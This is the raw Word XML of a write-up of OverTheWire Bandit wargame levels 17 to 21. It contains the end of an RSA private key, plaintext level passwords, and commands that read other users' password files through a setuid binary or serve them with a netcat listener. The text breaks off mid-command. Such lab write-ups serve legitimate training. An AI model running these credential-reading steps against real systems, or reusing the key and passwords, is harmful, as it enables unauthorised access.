    <w:p w14:paraId="72DFBC78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+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4E3632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8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81C441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SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2052ABE9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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HCctNi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC48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C4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FwjulhttFx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC48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C4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rHYKhLidZDFYeiE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/v45bN4yFm8x7R/b0iE7KaszX+Exdvt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E99C943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SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCACAFC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R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD9EF80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Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C5E60D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R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441777C9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L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B259F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blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF292A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YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B1962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77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329985F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dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC75132" w14:textId="77777777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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vBgsyi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ujbjY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D988DB" w14:textId="6282DF73" w:rsidR="00EC4813" w:rsidRPr="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC4813">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-----END RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516006FA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6BF890B7" w14:textId="0CD4B500" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for port scanning and handle SSH key setup with proper permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D4ABE6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67CF6BAF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="233729E4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6E7ADF7D" w14:textId="7A3D1E96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17 → Level 18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADCA01D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7CF77EE1" w14:textId="79083CF4" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: diff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB71CD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="40D9AD40" w14:textId="380F53AE" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find password by comparing two password files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D839AD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7729A259" w14:textId="0125E319" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: `diff </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwords.old</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwords.new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13461DF5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="03F7E998" w14:textId="1AF9A02C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9186D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Compared two password files using diff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BAEDE2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Identified the changed line showing new password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F44BA3C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6AA98668" w14:textId="285A045B" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0496323B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1111AADF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD4F1A5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1D472F78" w14:textId="7D3CEE3F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Learning: Use diff command to compare files and identify changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF4D10E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434A4102" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6ED20AA9" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="53B8F123" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7907BE80" w14:textId="15CB6C03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18 → Level 19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39243F31" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3E991D08" w14:textId="29B82D09" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: ssh (command execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB9AC5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="596D2964" w14:textId="5578242F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Execute command via SSH when login shell is restricted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9D983" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7F7A5DEA" w14:textId="1029CF2C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `ssh bandit18@bandit.labs.overthewire.org -p 2220 cat readme`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471C65B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6BD35DB5" w14:textId="5061AA16" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BEE1FD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Bypassed restricted shell by executing command directly via SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F07CDB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Read readme file without interactive login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF29E26" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="65A9E14F" w14:textId="64C3D083" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413574CE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACEEC43" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4A8F9F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5A7492F6" w14:textId="28FE2FAA" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Execute commands through SSH without interactive shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4536DD28" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DCF795" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1F928DDB" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7699A9B4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="00104545" w14:textId="37FB6AF5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19 → Level 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E2AAE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6AF81B0B" w14:textId="113A922C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B326794" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="67BC86D5" w14:textId="0170DCE3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Objective: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary to read password file as different user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D9310" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="404FA60D" w14:textId="030E5E36" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `./bandit20-do cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit20`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA22760" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="49CD61DF" w14:textId="2948F019" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730733D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">1. Found </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary that executes commands as bandit20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C1D316" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used it to read bandit20's password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBCA5C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7B1EFD51" w14:textId="351752A3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8FAB8" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE74D11" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1684787E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="730F423A" w14:textId="16110B58" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Understand </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binaries and privilege escalation concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6C9DB6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F9D7E2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="52179800" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5810965D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0F65630D" w14:textId="434317DD" w:rsidR="00B305D3" w:rsidRPr="0034564F" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs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20 → Level 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F95B2EE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6CFE19B1" w14:textId="6C9A9456" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2C9535" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2865007A" w14:textId="1AD11E10" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Use network client that validates password before giving next one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0034A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="581B05D9" w14:textId="00EE3392" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Commands Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC391D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l -p 12345 &lt; /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit20 &amp;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E7DADD" w14:textId="658DF202" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suconnect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 12345`</w:t>
      </w:r>
      <w:r w:rsidR="00EC4813" w:rsidRPr="00EC4813">
        <w:t xml:space="preserve">  (2 times)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C41524" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="746C0381" w14:textId="394A6BAD" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF6E9C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">1. Started </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener serving current password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D35587" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">2. Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suconnect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary to connect and validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1484E374" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Received next level password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49169096" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="01B5B438" w14:textId="7798CA70" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF8723" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80056F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: EeoULMCra2q0dSkYj561DX7s1CpBuOBt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D5B3F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="48827D9E" w14:textId="4B3C3967" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Coordinate network services and understand client-server validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119E872" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D6269B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4B773124" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="36A4FFB4" w14:textId="7FF75179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21 → Level 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F27D1F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5BB6FB35" w14:textId="35D6240E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFFE4B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="675B3525" w14:textId="611565B5" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Objective: Find password by examining </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3112CB99" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3919696D" w14:textId="4B71B30F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E337C96" w14:textId="58BDB357" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4813">
        <w:t>ls -l /etc/</w:t>
      </w:r>
